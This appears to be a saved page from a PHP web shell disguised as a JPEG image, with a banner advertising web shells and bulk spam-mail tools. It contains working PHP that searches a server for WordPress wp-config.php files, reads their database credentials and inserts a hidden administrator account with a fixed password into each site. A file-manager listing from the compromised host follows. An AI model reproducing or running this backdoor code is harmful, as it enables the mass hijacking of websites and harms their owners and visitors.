����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

topplmrk@216.73.216.55: ~ $
<?php   function scan($path) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . DIRECTORY_SEPARATOR . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     scan($p);                 } elseif ($file === 'wp-config.php') {                     inject($p);                 }             }         }     } } function inject($p) {     $user_login = 'root';     $user_password = '7bSMDFuCLh';     $user_email = 'admin@wordpress.com';     $data = @file_get_contents($p);     if ($data === false) {         return;     }     $pattern = "/table_prefix\s*=\s*'([^']*)';/i";     if (preg_match($pattern, $data, $matches)) {         $table_prefix = $matches[1];     } else {         $table_prefix = 'wp_';     }     $lines = array_map('rtrim', file($p));     $conf = [];     foreach ($lines as $line) {         if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) {             $conf[$matches[1]] = parse_define_value($line);         }     }     if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) {         $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']);         if ($mysqli->connect_errno) {             return;         }         $user_login = $mysqli->real_escape_string($user_login);         $user_password = $mysqli->real_escape_string($user_password);         $user_email = $mysqli->real_escape_string($user_email);         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 $result->close();                 $mysqli->close();                 return;             }             $result->close();         }         $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '',         (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1),         0, '{$user_login}' FROM DUAL WHERE NOT EXISTS (     SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );";         if ($mysqli->query($add_user_query)) {             $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $mysqli->query($add_usermeta_query1);             $mysqli->query($add_usermeta_query2);         }         $site_url = false;         if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) {             $row = $result->fetch_object();             $result->close();             $site_url = $row->option_value;         }         if (!$site_url || strpos($site_url, 'http') !== 0) {             if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) {                 $row = $result->fetch_object();                 $result->close();                 $site_url = $row->user_url;             }         }         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 echo "<f>{$site_url}@@@{$p}</f>\n";             }             $result->close();         }         $mysqli->close();     } } function parse_define_value($line) {     if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) {         return $matches[1];     }     return null; } function scanRootPaths() {     if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {         foreach (range('A', 'Z') as $driveLetter) {             $drive = $driveLetter . ':\\';             if (is_dir($drive)) {                 scan($drive);             }         }     } else {         scan('/home');     } } scanRootPaths(); die('!ended!');

Filemanager

Name Type Size Permission Actions
.accept File 4.46 KB 0644
.accepted File 55 B 0644
.bind File 4.46 KB 0644
.binding File 16 B 0644
.cache File 50 B 0644
.center File 1.37 KB 0644
.class File 54 B 0644
.classes File 54 B 0644
.config File 4.46 KB 0644
.content File 9.21 KB 0644
.created File 54 B 0644
.db2_convert File 46 B 0644
.dba_insertion File 53 B 0644
.dbx_convert File 48 B 0644
.dchunk File 56 B 0644
.desc File 2.52 KB 0644
.element File 61 B 0644
.ent File 42.87 KB 0644
.fac File 59 B 0644
.hld File 16 B 0644
.ibase_pconnection File 9.22 KB 0644
.include File 1.39 KB 0644
.internal File 47 B 0644
.key File 9.21 KB 0644
.lock File 54 B 0644
.locked File 4.46 KB 0644
.marker File 4.46 KB 0644
.mb_convert File 4.46 KB 0644
.multi File 4.46 KB 0644
.oauthexceptions File 47 B 0644
.ob_iconv_handle File 52 B 0644
.obj File 48 B 0644
.object File 2.7 KB 0644
.parle_tokens File 58 B 0644
.partition File 4.46 KB 0644
.pointer File 55 B 0644
.post File 53 B 0644
.property_set File 9.21 KB 0644
.rec File 48 B 0644
.record File 9.21 KB 0644
.ref File 52 B 0644
.request File 141 B 0644
.requests File 4.46 KB 0644
.res File 9.21 KB 0644
.reset File 51 B 0644
.resource File 9.21 KB 0644
.rfind File 56 B 0644
.rindex File 4.46 KB 0644
.rjust File 4.46 KB 0644
File 0 B 0
.symbol File 55 B 0644
.sys File 4.46 KB 0644
.system File 46 B 0644
.tkn File 9.21 KB 0644
.uconvert File 9.21 KB 0644
.value File 52 B 0644
0kp9kicl7qr35dS4mwn File 0 B 0600
0neest62afj96hPpQad File 0 B 0600
1fof11ft4bfp6caFwhC File 0 B 0600
1hn19ncu6lr76esKi8T File 0 B 0600
2ahql2nn1jl73Qu1ZAm File 0 B 0600
2l1nab706vudagqRvhn File 0 B 0600
2l748vi3urt77knIDpa File 0 B 0600
2ve7j945lqte1mzu3ch File 0 B 0600
3c5ngupr2uckcCuVA2v File 0 B 0600
3sa1ah8m8me454HKVhS File 0 B 0600
4cq9gltgkc95cnxB7kf File 0 B 0600
5e9120kp1cbnb1kUhau File 0 B 0600
5h253stm5e27a5fxdF3 File 0 B 0600
5jim3q0ucvdjbt8U8nC File 0 B 0600
5n85i1qbsj2aauSxirV File 0 B 0600
6g4c0den11f9bbcylbB File 0 B 0600
72tmjgdanv6m1NU37u5 File 0 B 0600
76dugr1bk0825180UUS File 0 B 0600
7o0tghjk2b4l56jXPe0 File 0 B 0600
7suvvmlk96lj8dWWGCv File 0 B 0600
809t0td3fghk3l8Pl7c File 0 B 0600
84hghh1ofus2bADsmuE File 0 B 0600
8r4hi5c1hmsfa70hCew File 0 B 0600
8sti8lvq5osp20pbg10 File 0 B 0600
926soiecjc655yMFiFR File 0 B 0600
95e3nnv7usrqcJD0TBZ File 0 B 0600
9cbjgisqm9dk7zbgEF7 File 0 B 0600
9qkbf2evhvbt26Jf0wB File 0 B 0600
a9cbhoa7ojsr8UzBn3F File 0 B 0600
baaonkl45mda4ZI1AJB File 0 B 0600
bsoabk5j4t067wI1Yod File 0 B 0600
bt213gps6qlach1Izll File 0 B 0600
c9heo8q1ek0ddQb3aus File 0 B 0600
cich2u79peqe7Kh0E7u File 0 B 0600
cq3lt45kej5hflzQFPG File 0 B 0600
ct649fgcpi6l5Bs6UMA File 0 B 0600
ctl5vlbu909d3E8aYKi File 0 B 0600
d51gs4jhttpd7odjxmQ File 0 B 0600
d9i7k2aj6ao06xlxtoh File 0 B 0600
e8ppsv5jptoh4Db6tLg File 0 B 0600
eojttmvhs7218zgZN5J File 0 B 0600
f639d250j0s97NvIjRW File 0 B 0600
fcbq21k5hrthcucF11Z File 0 B 0600
ftvp1ulea1qtaEkEZZu File 0 B 0600
fvejji6tgtdidHZrDKW File 0 B 0600
fvj9oclfsi2ab2P0RPg File 0 B 0600
g59s9plkcmbgfRmNlG6 File 0 B 0600
gu9ob7n07ust3r4O8YS File 0 B 0600
h29laod51mnmfblauM4 File 0 B 0600
h7mmpe6bhn9f4WvARFK File 0 B 0600
hejt5sb8nv1udhBfWH6 File 0 B 0600
hf5tesfg5tjq617NcXR File 0 B 0600
i831khj0j7l6bNoxZYz File 0 B 0600
iffjkq63f4gp8kP3mjt File 0 B 0600
ivuba8tc1o8abTTuZuI File 0 B 0600
j6k7s0f53jpk8R9Cp12 File 0 B 0600
jcsgbloap4gp7QTRfrb File 0 B 0600
jdt6chaectgscc956Mj File 0 B 0600
jf5iblbmr7pefbsAIRL File 0 B 0600
jlf845ulukb4fHBYDEC File 0 B 0600
joj6nagg0ne27bxCeXa File 0 B 0600
k98tf6h39appemgVoHB File 0 B 0600
kqdv4pi48gebdMIPW1G File 0 B 0600
ku0dhkij643cdgFyDkK File 0 B 0600
lgec7k7sf0a3a725e3i File 0 B 0600
ltc6m6cn15qh9vszCxV File 0 B 0600
m0ri19iabco55drjJVc File 0 B 0600
m5h5lk6rbbol3UZIr4u File 0 B 0600
moanturnornj3e1oy7D File 0 B 0600
File 0 B 0777
nf4qr6mroeru8kLU9ec File 0 B 0600
nfa5hskvld9vfvCa4pi File 0 B 0600
nkc2208tnngecOwb5vc File 0 B 0600
nnsin67gv8br5jn2T3v File 0 B 0600
o434srmjfd4m52wQwCQ File 0 B 0600
o7fbojduv6cn9qBK1n8 File 0 B 0600
o8dp7e0m0oh4cRH2tTH File 0 B 0600
o9cmv2ap9smiebRGyTq File 0 B 0600
oa9vi0njf7bf2pyPgfb File 0 B 0600
obsob3tj0b7vaP1r9nS File 0 B 0600
ocg7aviaob1q82u6kY3 File 0 B 0600
omcsrcjmlhm81TNmK6j File 0 B 0600
pm1vojh4o7sf0IrEwNm File 0 B 0600
ptk8u5qoeegq8Vou3hU File 0 B 0600
pvsgnosaispa8ZrxNzZ File 0 B 0600
qb2purthgcm24ky8qHj File 0 B 0600
qjuc9vqou4fk97JRz48 File 0 B 0600
qrvuvlk7jtt03Og2rLy File 0 B 0600
r795jbba74qn9BNNcrx File 0 B 0600
rb0160piavoveU1bWG0 File 0 B 0600
rghmumk57ovf7YjOBnX File 0 B 0600
rh6mkrgr75vc6tmiUKY File 0 B 0600
t06ouhl8in335pBFUdb File 0 B 0600
t85bmq00esk96Y7OkyJ File 0 B 0600
u3lecuv9f26oagyNKnZ File 0 B 0600
u7atodshcnmndWkQiOr File 0 B 0600
u7p6cllt0nv50i7OuvM File 0 B 0600
u7uoa94a3r8d7VWFQYG File 0 B 0600
ulh5skkppohv2wLnXaj File 0 B 0600
unsavrma277l6LIZHcX File 0 B 0600
v9sefat9lth15XEkpHu File 0 B 0600
vg1au80jgqgufEaMETc File 0 B 0600
vtfhhr9uocld6CmZVgC File 0 B 0600
vtkhl227k1sp1dVjYyh File 0 B 0600